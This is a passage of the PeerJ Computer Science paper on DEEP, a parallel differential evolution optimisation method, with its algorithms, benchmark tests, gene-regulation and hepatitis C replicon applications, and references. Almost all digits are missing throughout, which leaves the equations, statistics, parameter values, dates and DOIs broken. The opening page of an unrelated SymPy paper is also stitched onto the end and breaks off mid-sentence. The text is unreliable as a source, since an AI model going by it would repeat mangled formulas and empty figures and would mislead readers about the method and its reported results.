banga, ) that is performed each iteration, where is a control parameter. the specified number of best individuals is used to produce np offsprings. to increase the reliability of the deep method we implemented a new selection rule, described in detail in kozlov et al. ( ), in which several different objective functions are considered in order to accept or reject an offspring to new generation. this feature permits to combine different types of experimental observations and the a priori information in one and the same fitting procedure. kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm . differential evolution entirely parallel method initialization: the population is initialized randomly. iteration = while stopping criterion is not met do iteration = iteration + recombination: if the predefined number of iterations passed. then make scatter search step else for all individuals in population do recombine (individual) end for end if evaluation: objfunc (population) selection: for all offsprings do select (offspring) end for adaptation: update scaling and crossover parameters. if the predefined number of iterations passed. then substitute oldest individuals with the best ones. end if sort the population members by age and by quality. end while the operation of the method is described in the algorithm insertion. the execution starts with initialization block in which a set of np parameter vectors vg, of length k is randomly assigned the values satisfying the given constraints qlk <qk <q u k , k= ,...,k . the main loop of the algorithm consists of recombination, evaluation, selection and adaptation blocks that are detailed below. calculations are terminated when the objective function variation becomes less than a predefined value during the several consecutive steps or the maximal number of generations gmax is exceeded. objective function f for several vectors is calculated in parallel. the size of population np, the frequencies and for old population members substitution and scatter search step together with the number of substituted individuals and maximal number of iterations gmax are the main control parameters of the method. constraints handling using the deep method, one can solve both unconstrained and constrained optimization problems. upper and lower bounds are to be defined for each parameter for initialization. kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. constraints may be imposed in the form of inequalities or equalities for a subset of parameters or their combinations. constraints in form ( ), ( ) can be reduced by maximization or summation: h(q,y )= nh � j= hj(q,y ); g(q,y )= ng � m= gm(q,y ), where hj and gm is the violation of the corresponding constraint hj or gm and�denotes one of the aggregation methods—summation or maximization. f(q,y )=f(q,y )+h(q,y )+g(q,y ). however, the box constraints in the form ( ), that may be imposed for a subset i of pa- rameters qgk, k ∈ i are to be transformed. to do it let us introduce the new parameters uk: qk =αk+βksin(uk) or qk =αk+βktanh(uk), where αk =(q u k +q l k)/ ; βk =(q u k −q l k)/ . consequently, deep is applied to determine unconstrained parameters uk. the impact of different algorithmic parameters on method convergence was discussed in kozlov & samsonov ( ). recombination strategy algorithm . recombination proc recombine (individual) = { select other two random individuals. build the combined trial vector using ( ). generate the random index of parameter i. for all parameters starting from i do generate the random number u . if (u < probability of crossover) then take this parameter from first trial vector to offspring else if (u < −probability of crossover) then take this parameter from second trial vector to offspring else leave this parameter as is in offspring end if end for } the recombination step is demonstrated in the algorithm insertion. let vi, , i= ,..., np denote a set of the randomly generated parameter vectors for the initial generation kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. j = , vi,j ={vi,j(k)}=(qik)k= ,...,k , where k is the number of parameters q and np is the fixed size of the set. the first trial vector for index g is calculated by: vg,j+ =v a,j +s◦(vb,j−vc,j) where va, vb and vc are different members of the current generation j with randomly chosen indices a, b and c, and s is a vector of scaling constants for each parameter and◦ denotes element-wise multiplication. the second optional trial vector is calculated using ‘‘trigonometric mutation rule’’ (fan & lampinen, ). vg,j+ = va,j+vb,j+vc,j +(ϕb−ϕa)(v a,j −vb,j) + (ϕc−ϕb)(v b,j −vc,j)+(ϕa−ϕc)(v c,j −va,j) where ϕ•=|f(v•,j)|/ϕ∗,•=a,b,c, ϕ∗=|f(va,j)|+|f(vb,j)|+|f(vc,j)|, and f(x) is the main objective function to be minimized. the combined trial vector in case of binomial recombination type is defined as follows: vg,j+ (k)=   vg,j+ (k), if rk <pk, vg,j+ (k), else if rk < −pk, vg,j(k), otherwise ( ) where rk =u( , ) is a random number uniformly distributed between and , p is the vector of crossover probabilities for all parameters. the first trial vector vg,j+ is used continuously for all parameters k until the random number becomes bigger than p in case of the exponential type of recombination. scatter search step let us consider vg,j, g = ,..., as the best members of current generation j sorted according to the value of the objective function f such that f(v ,j) < f(v ,j) < ···< f(v ,j) as described in egea, martí & banga ( ). each vector vb,j is to be combined with the rest of vectors va,j,∀a, a∈[ , ,..., ], a =b. two new points within the search space are defined: c =v b,j −d( +αβ); c =v b,j +d( −αβ); d = va,j−vb,j , where α= { if b<a − if b>a, β= |a−b|− − . then the offspring is created according to the formula: vb,j+ =c +(c −c )◦r, where r ={rk}, rk =u( , ), k = ,...,k is a random number uniformly distributed between and . kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. selection rule algorithm . selection proc select (individual) = { if (f < the value of the parent) then accept offspring else for all criteria fi, hj, gm as f do if (f < the value of the parent) then generate the random number u . if (u < control parameter for this criterion) then accept offspring end if end if end for end if } in order to increase the robustness of the procedure we have implemented the follow- ing selection rule for de, described in detail in kozlov et al. ( ) (see the algorithm insertion). briefly, several different objective functions are used to decide if an offspring will be selected for a new generation. firstly, the main objective function is checked. the offspring replaces its parent if the value of this function for offspring’s set of parameters is less than that for the parental one. in the opposite case the additional objective functions are considered. the offspring replaces its parent if the value of any other objective function is better, and a randomly selected value is less than the predefined parameter for this function. preserving population diversity the original de algorithm was highly dependent on internal parameters as reported by other authors, see, for example (gaemperle, mueller & koumoutsakos, ). an efficient adaptive scheme for selection of internal parameters sk and pk based on the control of the population diversity was proposed in zaharie ( ). let us consider the variation for parameter k in the current generation: vark = np np∑ i= ( qik− np np∑ l= qlk ) where k= ,...,n. for the next generation the scaling constant is calculated by sk =   √ np ·(ρk− )+pk( −pk) ·np ·pk np ·(ρk− )+pk( −pk)≥ sinf np ·(ρk− )+pk( −pk)< kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. or alternatively the crossover probability is adopted as pk = { −(np ·s k− )+ √ (np ·s k− ) −np ·( −ρk) ρk ≥ pinf ρk < where sinf = / √ np, pinf = , ρk =γ ( varpreviousk /vark ) and γ is a new constant that controls the decrease of the variability of parameters in the course of iteration process. mixed integer-real problems de operates on floating point parameters, while many real problems contain integer parameters, e.g., indices of some kind. two algorithms for parameter conversion from real to integer are implemented in deep method as described in kozlov et al. ( ). the first method rounds off a real value to the nearest integer number. the second procedure consists of the following steps: • the values are sorted in ascending order. • the index of the parameter in the floating point array becomes the value of the parameter in the integer array. parallelization of objective function calculation algorithm . objective function proc objfunc (population) = { create a pool of a specified number worker threads. create an asynchronous queue of tasks q in the pool. for all individuals in population as x do push x to queue q. end for wait all worker threads in the pool to finish. } proc worker thread (parameters) = { . transform parameters from real to integer as needed. . save parameters into temporary file of specified format. . call specified program and supply the temporary file to it. . capture output of the program. . split output with specified delimiters into a list of values. . assign values in the specified order to fi, hj, gm,∀i,j,m. . return worker thread to pool. } kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. deep can be effectively parallelized due to independent evaluation of each population member. various models for evolutionary algorithms parallelization have been developed, such as master-slave, island, cellular or hybrid versions (tasoulis et al., ). the approach implemented in deep (see the algorithm insertion) utilizes the multicore architecture of modern cpus and employs the pool of worker threads with asynchronous queue of tasks to evaluate the individual solutions in parallel. the calcu- lation of objective function for each trial vector using the command supplied by a user is pushed to the asynchronous queue and starts as soon as there is an available thread in the pool. such approach is similar to ‘‘guided’’ schedule in openmp but gives us more flexibility and control. the command output is automatically recognized according to the specified format. all threads started in the current iteration are to be finished before the next one starts. implementation deep is implemented in c programming language as console application and employs interfaces from glib project (https://developer.gnome.org/glib/), e.g., thread pool api. the architecture allows a user to utilize any programming language or computer system, such as r, octave or python to implement both mathematical model and comparison of solution with experimental data. control parameters all the control parameters are specified in the single input file as a key-value pairs in ini- format supplied to the deep executable on the command line. the control parameters are arranged into three groups described below. mathematical model section specifies the parameter number, both the lower and upper parameter bounds, as well as the software itself necessary to run a model. a possibility is provided to indicate parameters that are to be kept unchanged. objective function section defines the aggregation methods for constraints and multiple objectives. the type of function, i.e., main or additional objective, equality or inequality constraint, is denoted by special keyword. ranks and weights are to be given here. method settings section allows the user to tune the settings, namely, population size, stopping criterion, offspring generation strategy, the number of the oldest individuals to be substituted in the next generation , the maximal number of working threads and the seed for random number generator. two options for offspring generation are provided, namely the selection of best individual or ‘‘trigonometric mutation.’’ the stopping criterion can limit the convergence rate, absolute or relative value of the objective function, number of generations or the wall clock time. the initial population is by default generated randomly within the limits given; however, it is also possible to define one initial guess and generate the individuals in the specified vicinity of it. programming interfaces the deep method can be used as the static or dynamic shared object and embedded in another software package. application programming interfaces (apis) can be used to kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://developer.gnome.org/glib/ http://dx.doi.org/ . /peerj-cs. connect with existing code implementing mathematical model and objective function. this approach is often preferred in academic and industrial applications where the high level modeling system language is not sufficient or the computation time should be reduced. results method testing on benchmark functions to evaluate the performance of deep we used three simple multimodal test functions of dimension d= from the competition on real parameter single objective optimization (cec- ) test suite (liang, qu & suganthan, ), namely: shifted and rotated griewank’s function. h(x)=h ( m ( (x−oh) )) + ; h(x)= d∑ i= x i − d∏ i= cos ( xi √ i ) + shifted rastrigin’s function. r(x)=r ( . (x−or) ) + ; r(x)= d∑ i= (x i − cos( πxi)+ ) shifted schwefel’s function. s(x)= s ( (x−os) ) + ; s(x)= . ×d− d∑ i= g(zi(xi)), where zi=xi+ . x , and g(zi)=   zisin(|zi| / ) if |zi|< , ( −mod(zi, ))∗ ∗sin (√ | −mod(zi, )| ) − − (zi− ) d if zi > , (mod(|zi|, )− )∗ ∗sin (√ |mod(zi, )− | ) − − (zi+ ) d if zi <− , and the global optimum is shifted to oi =[oi ,oi ,...,oid]t and rotated using the rotation matrix mi. for each function runs were performed with identical settings and with random initial population. the maximal allowed number of functional evaluations was set to × . other deep settings were np = , gmax = , and = . the measured error was the difference between the known optimal value and the obtained solution. following the methodology described in tanabe & fukunaga ( ) we used the wilcoxon rank-sum test with significance level p < . to compare the evaluation kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the results of statistical comparison of deep with the top three methods from cec- on functions. the symbols+,−,≈ indicate that deep performed significantly better (+), significantly worse (−), or not significantly different (≈) compared to another algorithm using the wilcoxon rank- sum test (significantly, p< . ). all results are based on runs. deep vs cmlp l-shade umoeas − (worse) ≈ (no sig.) + (better) results for runs with the results of the top three methods from cec- (liang, qu & suganthan, ) taken from cec- report: . covariance matrix learning and searching preference (cmlp) (chen et al., ), . success-history based parameter adaptation for differential evolution (l-shade) (tanabe & fukunaga, ), . united multi-operator evolutionary algorithms (umoeas) (elsayed et al., ). the number of benchmark functions from three tested (+), (−), (≈) is presented in table . deep demonstrated the same or better performance. the method test on reduced model of gene regulation to demonstrate how deep works in applications we developed a realistic benchmark problem based on real biological model of gap gene regulatory network (kozlov et al., b). a model provides a dynamical description of gap gene regulatory system, using detailed dna-based information, as well as spatial tf concentration data at varying time points. the gap gene regulatory network controls segment determination in the early drosophila embryo (akam, ; jaeger, ; surkova et al., ). the state variables of this model are the concentrations of mrnas and proteins encoded by four gap genes hb, kr, gt, and kni. the model implements the thermodynamic approach in the form proposed in he et al. ( ) to calculate the expression of a target gene at the rna level. this level is proportional to the gene activation level also called the promoter occupancy, and is determined by concentrations of eight transcription factors hb, kr, gt, kni, bcd, tll, cad and hkb: eai (t)= zaon,i(t) zaon,i(t)+z a off,i(t) ( ) where zaon,i(t) and z a off,i(t) are statistical weights of the enhancer with the basal transcriptional complex bound and unbound, respectively. two sets of the reaction–diffusion differential equations for mrna uai (t) and protein concentrations vai (t) describe the dynamics of the system (reinitz & sharp, ; jaeger et al., ; kozlov et al., ): duai /dt =r a ue a i (t)+d a u(n)[(u a i− −u a i )+(u a i+ −u a i )]−λ a uu a i , ( ) dvai /dt =r a vu a i (t−τ a v )+d a v(n)[(v a i− −v a i )+(v a i+ −v a i )]−λ a vv a i , ( ) where n is the cleavage cycle number, rav and r a u are the maximum synthesis rates, d a v, d a u (to smooth the resulting model output) are the diffusion coefficients, λav and λ a u are the kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. decay rates for protein and mrna of gene a. the model spans the time period of cleavage cycles and a (c and c resp.) and the interval of a-p axis from % to % ( nuclei) of embryo length. the number of nuclei along the a-p axis is doubled when going from c to c . the model is fitted to data on gap protein concentrations from the flyex database (pisarev et al., ) and mrna concentrations from superfly (cicin-sain et al., ). to fit the model we used the residual sum of squared differences between the model output and data and we used the weighted pattern generation potential proposed in samee & sinha ( ) as the second objective function: rss(x,y)= ∑ ∀g,n,t:∃y g n (t) (xgn (t)−y g n (t)) wpgp(x,y)= +(penalty(x,y)−reward(x,y)) where g, n and t are gene, nucleus and time point respectively and reward(x,y)= ∑ iyi∗min(yi,xi)∑ iyi∗yi penalty(x,y)= ∑ i(ymax−yi)∗max(xi−yi, )∑ i(ymax−yi)∗ ∑ i(ymax−yi) were xi and yi are respectively predicted and experimentally observed expression in nucleus i, and ymax is the maximum level of experimentally observed expression. conse- quently, the combined objective function is defined by: f(q,y )= ∗ − ∗rss(v(q),v )+ . ∗ − ∗rss(u(q),u) +wpgp(v(q),v )+ . ∗wpgp(u(q),u) + − ∗penalty(q), ( ) where y ={v,u} contains data for u and v, and the function penalty limits the growth of regulatory parameters, and the weights were obtained experimentally. we simplified the original computationally expensive model (kozlov et al., b) to use it as a benchmark in our calculations as follows. firstly, we reduced the number of nuclei from to and considered only one target gene with dna sequence from kni. consequently, the number of parameters was reduced to , two of which are of integer type. biologically feasible box constraints in the form ( ) are imposed for parameters. next, we fitted this reduced model to the coarsened data and used the obtained solution and model parameters as the synthetic data for benchmark. thus, the exact parameters of benchmark optimization problem are known. to compare deep and meigor (egea et al., ) we run both methods in the same conditions and record the final value of the objective function ( ), final parameters and the number of functional evaluations. we considered those solutions for which the final functional value is less than . that corresponds to parameters close to exact known values. the welch two sample t-test demonstrated that deep used less objective function evaluations than meigor with p< . (see fig. ). real applications deep software was successfully applied to explain the dramatic decrease in gap gene expression in early drosophila embryo caused by a null mutation in kr gene. figure a kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of number of objective function evaluations for deep and meigor on reduced model of gene regulation. deep used less objective function evaluations than meigor with p < . according to welch two sample t-test. presents the topology of regulatory network inferred by fitting the dynamical model with parameters of gap gene expression to the wild type and kr mutant data simultaneously (kozlov et al., ). other deep applications include different problems described in ivanisenko et al. ( ); nuriddinov et al. ( ). recently, deep was used in the online ancestry prediction tool readmix that can identify the biogeographic origins of highly mixed individuals (kozlov et al., a). readmix is available at http://chcb.saban-chla.usc.edu/readmix/. two applications are discussed below in details. subgenomic hepatitis c virus replicon replication model the hepatitis c virus (hcv) causes hazardous liver diseases leading frequently to cirrhosis and hepatocellular carcinoma. no effective anti-hcv therapy is available up to date. design of the effective anti-hcv medicine is a challenging task due to the ability of the hepatitis c virus to rapidly acquire drug resistance. the cells containing hcv subgenomic replicon are widely used for experimental studies of the hcv genome replication mechanisms and the in vitro testing of the tentative medicine. hcv ns / a protease is essential for viral replication and therefore it has been one of the most attractive targets for development of specific antiviral agents for hcv. we used the new algorithm and software package to determine parameters (kinetic reaction constants) of the mathematical model of the subgenomic hepatitis c virus kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://chcb.saban-chla.usc.edu/readmix/ http://dx.doi.org/ . /peerj-cs. figure gene regulatory network, arrows and t-ended curves indicate activation and repressive inter- actions respectively, dotted lines show interactions present in wild type only (a). regulatory weights of in- dividual transcription factor binding sites (b). evolution of three objective functions during parameter fit- ting (c). see text for details. (hcv) replicon replication in huh- cells in the presence of the hcv ns protease inhibitor, see ivanisenko et al. ( ). the experimental data include kinetic curves of the viral rna suppression at various inhibitor concentrations of the vx- and biln- inhibitors (lin et al., ; lin et al., ). we seek for the set of parameters that minimizes three criteria. the main criterion (rss) is the residual sum of squared differences between the model output and data. additional criteria (f ) and (f ) penalize the deviation of the time to steady state and the number of viral vesicles at the steady state, respectively. the combined criterion was defined as follows: fcombined=rss+ . ·f + . ·f ( ) where the weights were obtained experimentally. the dependence of the best value of the combined criterion ( ) in population of individuals on the generation number for runs is plotted in fig. a. the objective function is to be evaluated once for each member of the generation, the size of which was set to . the plot of the criteria in the close vicinity of the optimal values of the two parameters from the set is shown in figs. b and c. despite of the fact that the criteria do not take a minimal values in one and the same point, the algorithm produces reliable approximation of the optimum. the comparison of the model output and experimental dependencies of the viral rna suppression rate on inhibitor concentration is shown in figs. d and e. it is worth to note that, the model correctly reproduces experimental kinetics of the viral rna suppression. the predictive power of the model was estimated using the experimental data on dependencies of the viral rna suppression rate on the increasing concentration of the sch- (malcolm et al., ) and itmn- (seiwert et al., ) inhibitors. these kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure (a) the combined criterion ( ) vs. the generation number for runs. function eval- uations were performed by the minimization procedure for each generation. (b, c) the criteria graphs are shown in the close vicinity of the optimal values of the four parameters. the values of the parameters found by the algorithm are denoted as x and y. (d, e) the viral rna suppression in the presence of the ns protease inhibitors in different concentrations. the dependence of the viral rna suppression on the increasing concentration of biln- (d) and vx- (e) inhibitors is shown for the third day post- treatment. a solid line is used to show model output and points correspond to the experimental data (lin et al., ; lin et al., ). (f, g) the predicted kinetics and the suppression rate of the viral rna in comparison with data not used for parameter estimation. the dependencies of the suppression rate of the viral rna on the increasing concentration of the sch- (f) and itmn- (g) inhibitors (mal- colm et al., ; seiwert et al., ). data were not used for parameter estimation. as it can be seen in figs. f and g, the model correctly reproduces experimental observations and thus can be used for in silico studies. sequence-based model of the gap gene regulatory network recently, deep method was successfully applied to recover parameters of the dna sequence-based model ( )–( ) of regulatory network of gap genes—hb, kr, gt, and kni— and transcription factors: hb, kr, gt, kni, bcd, tll, cad and hkb (kozlov et al., b). the trained model provides a tool to estimate the importance of each tf binding site for the model output (see fig. b). we showed that functionally important sites are not exclusively located in cis-regulatory elements and that sites with low regulatory weight are important for the model output (kozlov et al., ). the evolution of the three objective functions during one optimization run is shown in fig. c. note that the wpgp and the penalty functions do not decline monotonically and simultaneously. in a few first steps these functions reach their maximal values while rss falls sharply, that corresponds to the adaptation of the control parameters of the algorithm and substitution of old parameter sets with good ones. then wpgp starts to decay, and penalty fluctuates at high level, while rss decays approximately at the same rate as wpgp. as penalty depends only on regulatory parameters, its behaviour at this stage illustrates that it disallows the process to be trapped in some local minimum with extreme values of parameters. during the second half of the optimization process, penalty kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. reaches its final low level and stays at it almost constant till convergence while the rss and wpgp exhibit a modest growth and then converge. this illustrates the ability of deep to balance several objective functions. the model output at this stage is not changed much as indicated by rss though the absolute values of regulatory parameters are fine tuned. conclusions the parallelization of objective function calculation implemented in deep method considerably reduces the computational time. several members of the current generation are evaluated in parallel, which in our experience with sequence-based model of the gap gene regulatory network, resulted in times speedup on core computational node (intel xeon , joint supercomputer center of the russian academy of sciences, moscow). the calculation of objective functions in parallel threads took approximately the same s as one sequential job, and the optimization runs were able to converge in h after approximately , functional evaluations. to sum up, we elaborated both the method and the software, which demonstrated high performance on test functions and biological problems of finding parameters in dynamic models of biological processes by minimizing one or even several objective functions that measure the deviation of model solution from data. acknowledgements we are thankful to the joint supercomputer center of the russian academy of sciences, moscow, for provided computational resources. additional information and declarations funding the implementation and testing was supported by rsf grant no. - - , the method development was supported by rfbr grant - - and the programme ‘‘ - - ’’ by the russian ministry of science and education. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: rsf: - - . rfbr: - - . russian ministry of science and education: - - . competing interests the authors declare there are no competing interests. author contributions • konstantin kozlov conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • alexander m. samsonov conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. • maria samsonova conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: sourceforge: http://deepmethod.sourceforge.net/ opensuse: https://build.opensuse.org/project/repositories/home:mackoel:compbio. references akam m. . the molecular basis for metameric pattern in the drosophila embryo. development : – . chen l, liu h-l, zheng z, xie s. . a evolutionary algorithm based on covariance matrix learning and searching preference for solving cec benchmark prob- lems. in: cec special session and competition on single objective real-parameter numerical optimization, vol. . piscataway: ieee, – . chu kw, deng y, reinitz j. . parallel simulated annealing by mixing of states. the journal of computational physics : – doi . /jcph. . . cicin-sain d, pulido ah, crombach a, wotton kr, jiménez-guri e, taly j-f, roma g, jaeger j. . superfly: a comparative database for quantified spatio- temporal gene expression patterns in early dipteran embryos. nucleic acids research (d ):d –d doi . /nar/gku . egea ja, henriques d, cokelaer t, villaverde af, macnamara a, danciu d-p, banga jr, saez-rodriguez j. . meigo: an open-source software suite based on metaheuristics for global optimization in systems biology and bioinformatics. bmc bioinformatics ( ): – doi . / - - - . egea ja, martí r, banga jr. . an evolutionary method for complex-process optimization. computers & operations research ( ): – doi . /j.cor. . . . elsayed sm, sarker ra, essam dl, hamza nm. . testing united multi-operator evolutionary algorithms on the cec- real-parameter numerical optimization. in: cec special session and competition on single objective real-parameter numerical optimization, vol. . piscataway: ieee, – . fan h-y, lampinen j. . a trigonometric mutation operation to differential evolu- tion. journal of global optimization : – doi . /a: . fomekong-nanfack y. . genetic regulatory networks inference: modeling, parameters estimation and model validation. phd thesis, university of amsterdam. fomekong-nanfack y, kaandorp j, blom j. . efficient parameter estimation for spatio-temporal models of pattern formation: case study of drosophila melanogaster. bioinformatics ( ): – doi . /bioinformatics/btm . kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://deepmethod.sourceforge.net/ https://build.opensuse.org/project/repositories/home:mackoel:compbio http://dx.doi.org/ . /jcph. . http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . / - - - http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /a: http://dx.doi.org/ . /bioinformatics/btm http://dx.doi.org/ . /peerj-cs. gaemperle r, mueller sd, koumoutsakos p. . a parameter study for differential evolution. in: grmela a, mastorakis ne, eds. advances in intelligent systems, fuzzy systems, evolutionary computation. wseas press, – . he x, samee mah, blatti c, sinha s. . thermodynamics-based models of tran- scriptional regulation by enhancers: the roles of synergistic activation, cooperative binding and short-range repression. plos computational biology ( ):e doi . /journal.pcbi. . ivanisenko n, mishchenko e, akberdin i, demenkov p, likhoshvai v, kozlov k, todorov d, samsonova m, samsonov a, kolchanov n, ivanisenko v. . replication of the subgenomic hepatitis c virus replicon in the presence of the ns protease inhibitors: a stochastic model. biophysics ( ): – doi . /s . ivanisenko nv, mishchenko el, akberdin ir, demenkov ps, likhoshvai va, kozlov kn, todorov di, gursky vv, samsonova mg, samsonov am, clausznitzer d, kaderali l, kolchanov na, ivanisenko va. . a new stochastic model for subgenomic hepatitis c virus replication considers drug resistant mutants. plos one ( ):e doi . /journal.pone. . jaeger j. . the gap gene network. cellular and molecular life sciences : – doi . /s - - -y. jaeger j, surkova s, blagov m, janssens h, kosman d, kozlov kn, manu, myasnikova e, vanario-alonso ce, samsonova m, sharp dh, reinitz j. . dynamic control of positional information in the early drosophila embryo. nature : – doi . /nature . kozlov k, chebotarev d, hassan m, triska m, triska p, flegontov p, tatarinova t. a. differential evolution approach to detect recent admixture. bmc genomics (suppl ):article s doi . / . kozlov k, gursky vv, kulakovskiy iv, dymova a, samsonova m. b. analysis of functional importance of binding sites in the drosophila gap gene network model. bmc genomics ( ): – doi . / - - -s -s . kozlov k, gursky v, kulakovskiy i, samsonova m. . sequence-based model of gap gene regulatory network. bmc genomics (suppl ):article s . kozlov k, ivanisenko n, ivanisenko v, kolchanov n, samsonova m, samsonov am. . enhanced differential evolution entirely parallel method for biomedical applications. in: malyshkin v, ed. lecture notes in computer science, vol. . new york: springer, – . kozlov k, samsonov a. . deep—differential evolution entirely parallel method for gene regulatory networks. journal of supercomputing : – doi . /s - - - . kozlov k, surkova s, myasnikova e, reinitz j, samsonova m. . modeling of gap gene expression in drosophila kruppel mutants. plos computational biology ( ):e doi . /journal.pcbi. . liang jj, qu by, suganthan pn. . problem definitions and evaluation criteria for the cec special session and competition on single objective real-parameter kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /s http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /nature http://dx.doi.org/ . / http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /peerj-cs. numerical optimization. technical report . singapore: computational intelligence laboratory, zhengzhou university, zhengzhou china and technical report, nanyang technological university. lin c, lin k, luong yp, rao bg, wei yy, brennan dl, fulghum jr, hsiao hm, ma s, maxwell jp, cottrell km, perni rb, gates ca, kwong ad. . in vitro resistance studies of hepatitis c virus serine protease inhibitors, vx- and biln : structural analysis indicates different resistance mechanisms. journal of biological chemistry ( ): – doi . /jbc.m . lin k, perni rb, kwong ad, lin c. . vx- , a novel hepatitis c virus (hcv) ns - a protease inhibitor, exhibits potent antiviral activities in hcv replicon cells. an- timicrobial agents and chemotherapy ( ): – doi . /aac. . . - . . malcolm ba, liu r, lahser f, agrawal s, belanger b, butkiewicz n, chase r, gheyas f, hart a, hesk d, ingravallo p, jiang c, kong r, lu j, pichardo j, prongay a, skelton a, tong x, venkatraman s, xia e, girijavallabhan v, njoroge fg. . sch , a mechanism-based inhibitor of hepatitis c virus ns protease, suppresses polyprotein maturation and enhances the antiviral activity of alpha in- terferon in replicon cells. antimicrobial agents and chemotherapy ( ): – doi . /aac. . . - . . mendes p, kell db. . non-linear optimization of biochemical pathways: applica- tions to metabolic engineering and parameter estimation. bioinformatics : – doi . /bioinformatics/ . . . moles cg, mendes p, banga jr. . parameter estimation in biochemical pathways: comparison of global optimization methods. genome research : – doi . /gr. . nuriddinov m, kazantsev f, rozanov a, kozlov k, peltek s, akberdin i, kolchanov n. . mathematical modeling of ethanol and lactic acid biosynthesis by theromphilic geobacillus bacteria. russian journal of genetics: applied research ( / ): – . pisarev a, poustelnikova e, samsonova m, reinitz j. . flyex, the quantitative atlas on segmentation gene expression at cellular resolution. nucleic acids research :d –d doi . /nar/gkn . reinitz j, sharp dh. . mechanism of eve stripe formation. mechanisms of develop- ment : – doi . / - ( ) -j. samee mah, sinha s. . evaluating thermodynamic models of enhancer activity on cellular resolution gene expression data. methods : – doi . /j.ymeth. . . . seiwert sd, andrews sw, jiang y, serebryany v, tan h, kossen k, rajagopalan rpt, misialek s, stevens sk, stoycheva a, hong j, lim sr, qin x, rieger r, condroski kr, zhang h, do mg, lemieux c, hingorani gp, hartley dp, josey ja, pan l, beigelman l, blatt lm. . preclinical characteristics of the hcv ns / a protease inhibitor itmn- (r ). antimicrobial agents and chemotherapy ( ): – doi . /aac. - . kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jbc.m http://dx.doi.org/ . /aac. . . - . http://dx.doi.org/ . /aac. . . - . http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . /gr. http://dx.doi.org/ . /nar/gkn http://dx.doi.org/ . / - ( ) -j http://dx.doi.org/ . /j.ymeth. . . http://dx.doi.org/ . /aac. - http://dx.doi.org/ . /peerj-cs. spirov av, kazansky ab. . jumping genes-mutators can raise efficacy of evolu- tionary search. in: proceedings of the genetic and evolutionary computation conference gecco . san francisco: morgan kaufmann publishers inc. storn r, price k. . differential evolution—a simple and efficient heuristic for global optimization over continuous spaces. technical report tr- - . berkeley: icsi. suleimenov y. . global parameter estimation for thermodynamic models of transcriptional regulation. methods : – doi . /j.ymeth. . . . surkova s, kosman d, kozlov k, manu, myasnikova e, samsonova a, spirov a, vanario-alonso ce, samsonova m, reinitz j. . characterization of the drosophila segment determination morphome. developmental biology ( ): – doi . /j.ydbio. . . . tanabe r, fukunaga as. . improving the search performance of shade by using linear population size reduction. in: cec special session and competition on single objective real-parameter numerical optimization, vol. . piscataway: ieee, – . tasoulis d, pavlidis n, plagianakos v, vrahatis m. . parallel differential evolution. in: congress on evolutionary computation (cec ), vol. . piscataway: ieee, – . zaharie d. . parameter adaptation in differential evolution by controlling the population diversity. in: petcu d, ed. proceedigs of the th international workshop on symbolic and numeric algorithms for scientific computing. timisoara, romania, – . kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.ymeth. . . http://dx.doi.org/ . /j.ydbio. . . http://dx.doi.org/ . /peerj-cs. submitted june accepted november published january corresponding author aaron meurer, asmeurer@gmail.com academic editor nick higham additional information and declarations can be found on page doi . /peerj-cs. copyright meurer et al. distributed under creative commons cc-by . open access sympy: symbolic computing in python aaron meurer , christopher p. smith , mateusz paprocki , ondřej Čertík , sergey b. kirpichev , matthew rocklin , amit kumar , sergiu ivanov , jason k. moore , sartaj singh , thilina rathnayake , sean vig , brian e. granger , richard p. muller , francesco bonazzi , harsh gupta , shivam vats , fredrik johansson , fabian pedregosa , matthew j. curry , , , andy r. terrel , , Štěpán roučka , ashutosh saboo , isuru fernando , sumith kulal , robert cimrman and anthony scopatz department of mechanical engineering, university of south carolina, columbia, sc, united states polar semiconductor, inc., bloomington, mn, united states continuum analytics, inc., austin, tx, united states los alamos national laboratory, los alamos, nm, united states faculty of physics, moscow state university, moscow, russia department of applied mathematics, delhi 